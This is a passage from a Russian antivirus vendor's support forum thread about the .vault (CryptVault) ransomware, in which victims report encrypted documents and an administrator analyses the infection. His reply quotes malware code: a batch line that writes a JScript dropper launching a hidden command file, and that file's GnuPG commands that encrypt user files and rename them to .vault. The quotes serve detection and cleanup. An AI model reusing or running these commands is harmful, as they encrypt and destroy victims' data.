Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.

На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения PRO32 — надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.

Приглашаем вас присоединиться к новому форуму PRO32.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Шифровальщики файлов и подбор дешифраторов

файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS
 
Дмитрий Морозов
Дмитрий Морозов
Пользователь
Сообщений: 11
Баллов: 5
Регистрация: 19.02.2015
Размещено 19.02.2015 20:27:57
Зашифровались файлы с расшрирением  doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Ответы

Пред. 1 ... 45 46 47 48 49
 
Станислав Перевозников
Станислав Перевозников
Пользователь
Сообщений: 3
Баллов: 1
Регистрация: 28.10.2015
Размещено 28.10.2015 15:16:40
Это меня и удивило - антивирус его в принципе распознает, но не распознал в момент запуска/создания/работы, да и шифрование процесс не такой быстрый.  
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:17:02
вот этот скриптик надо удалять
Цитата
echo var cdp="%%TEMP%%\\a01dc229.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}>> "%temp%\7c62070c.js"
тот что выше, похоже, используют как обманку для антивируса. два однотипных скрипта, но только один из них запускает процесс шифрования.
а на него как раз - ноль реакции, хотя именно он содержит ссылку на командный файл a01dc229.cmd, в котором собраны все команды шифрования файлов. после обхода дисков и очистки от лишних строк.

вот с этим содержимым и надо ловить файл, здесь инфы предостаточно, чтобы отловить его.
Цитата
chcp 866
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault"
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"
Изменено: santy - 04.06.2016 18:08:54
[ Как создать образ автозапуска? ]
 
Ильдар Арасланов
Ильдар Арасланов
Пользователь
Сообщений: 1
Регистрация: 19.11.2015
Размещено 19.11.2015 18:06:48
На мой компьютер проник вирус (баннер) и испортил все текстовые документы, переведя их в формат Vault
1.jpg (97.58 КБ)
2.jpg (129.39 КБ)
Изменено: Ильдар Арасланов - 16.03.2017 06:17:04
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 19.11.2015 19:41:10
Ильдар, когда было шифрование по дате?
[ Как создать образ автозапуска? ]
 
Пред. 1 ... 45 46 47 48 49
Читают тему